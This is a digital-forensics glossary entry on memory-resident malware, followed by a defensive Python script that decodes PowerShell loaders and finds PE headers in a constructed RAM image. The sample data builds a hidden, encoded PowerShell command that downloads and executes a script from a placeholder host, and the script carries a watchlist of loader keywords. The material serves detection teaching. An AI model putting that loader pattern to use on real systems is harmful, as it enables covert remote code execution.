
Memory-resident malware

Definition

Malicious code that runs entirely from RAM and drops no executable on disk. Fileless malware, PowerShell and other script-based loaders that inject into legitimate processes, and some rootkits fall into this category (many "fileless" strains still stash a small launcher in the registry or a WMI subscription, so "no files" usually means no dropped binary, not no footprint at all). Because the only complete copy lives in volatile memory, a shutdown or reboot destroys it; live memory acquisition is therefore the primary means of capturing it, with the page file, hibernation file and crash dumps being the only places where partial remnants may survive a power-off.
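To show why a RAM capture is the artefact of record for this class of malware, the following is an added example (not part of the original glossary entry) of the kind of triage a responder runs over an acquired memory image: it carves Base64-encoded PowerShell command lines out of the image, decodes them, and flags loader indicators, and it finds PE headers that exist only in memory. The memory image, the indicator watchlist and the loader script are all constructed here for illustration; nothing in the sample comes from a real incident.

```python
import base64
import re
import struct

# Hypothetical watchlist of strings typical of in-memory PowerShell loaders.
INDICATORS = ("Invoke-Expression", "IEX", "DownloadString",
              "FromBase64String", "VirtualAlloc")

# powershell.exe accepts -EncodedCommand and its abbreviations, followed by
# Base64 of a UTF-16LE script.  Only ASCII command lines are matched here;
# a real image also holds UTF-16LE copies (process parameters) that need a
# second pass.
_ENC_RE = re.compile(
    rb"-(?:EncodedCommand|enc|ec|e)\s+([A-Za-z0-9+/]{20,}={0,2})",
    re.IGNORECASE,
)


def build_sample_image() -> bytes:
    """Constructed stand-in for a RAM capture: filler, one PowerShell loader
    command line, and a PE header that is not backed by any file on disk."""
    script = ("IEX (New-Object Net.WebClient)"
              ".DownloadString('http://example.invalid/a.ps1')")
    encoded = base64.b64encode(script.encode("utf-16le"))
    cmdline = b"powershell.exe -nop -w hidden -EncodedCommand " + encoded + b"\x00"
    # Minimal DOS/PE stub: 'MZ', e_lfanew at 0x3c pointing to 'PE\0\0' at 0x40.
    pe = bytearray(b"\x00" * 0x48)
    pe[0:2] = b"MZ"
    pe[0x3C:0x40] = struct.pack("<I", 0x40)
    pe[0x40:0x44] = b"PE\x00\x00"
    return b"\x00" * 64 + cmdline + b"\x00" * 128 + bytes(pe) + b"\x00" * 64


def find_encoded_powershell(image: bytes) -> list[dict]:
    """Carve -EncodedCommand payloads, decode them and tag indicator hits."""
    hits = []
    for m in _ENC_RE.finditer(image):
        try:
            decoded = base64.b64decode(m.group(1), validate=True).decode("utf-16le")
        except (ValueError, UnicodeDecodeError):
            continue  # not a real Base64/UTF-16LE payload; skip the candidate
        hits.append({
            "offset": m.start(),
            "script": decoded,
            "indicators": [i for i in INDICATORS if i in decoded],
        })
    return hits


def find_pe_headers(image: bytes) -> list[int]:
    """Return offsets of MZ headers whose e_lfanew points at a valid PE signature.
    Every 'MZ' in memory is a candidate, so the e_lfanew check weeds out
    coincidental byte pairs (Base64 text, for instance)."""
    offsets = []
    for m in re.finditer(b"MZ", image):
        off = m.start()
        if off + 0x40 > len(image):
            continue
        e_lfanew = struct.unpack_from("<I", image, off + 0x3C)[0]
        if 0x40 <= e_lfanew <= 0x400 and \
                image[off + e_lfanew:off + e_lfanew + 4] == b"PE\x00\x00":
            offsets.append(off)
    return offsets


if __name__ == "__main__":
    img = build_sample_image()
    for hit in find_encoded_powershell(img):
        print(f"encoded PowerShell at 0x{hit['offset']:x}: {hit['indicators']}")
        print("  ", hit["script"])
    for off in find_pe_headers(img):
        print(f"in-memory PE header at 0x{off:x}")
```

On a real capture the PE hits would be cross-checked against the process and VAD lists to confirm that the mapped image has no backing file, which is the defining trait of the entry above; the scanner here only shows that the evidence is recoverable from RAM at all.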

Related terms

Chain of custody
The documented chronological record of who collected, handled, transferred, and examined a piece of evidence. For digital evidence, chain of custody includes...
Live response
The process of collecting evidence and triage data from a running system without first powering it down. Preserves volatile artefacts that would...
Non-volatile data
Data that persists without power, such as files on a hard disk, SSD, or optical media, and data in non-volatile memory chips....
RFC 3227
Guidelines for Evidence Collection and Archiving, published by the IETF in February 2002. It defines the order of volatility, the documentation requirements...
Volatile data
Any digital information that is lost when power is removed or the system state changes. Examples include RAM contents, CPU register values,...
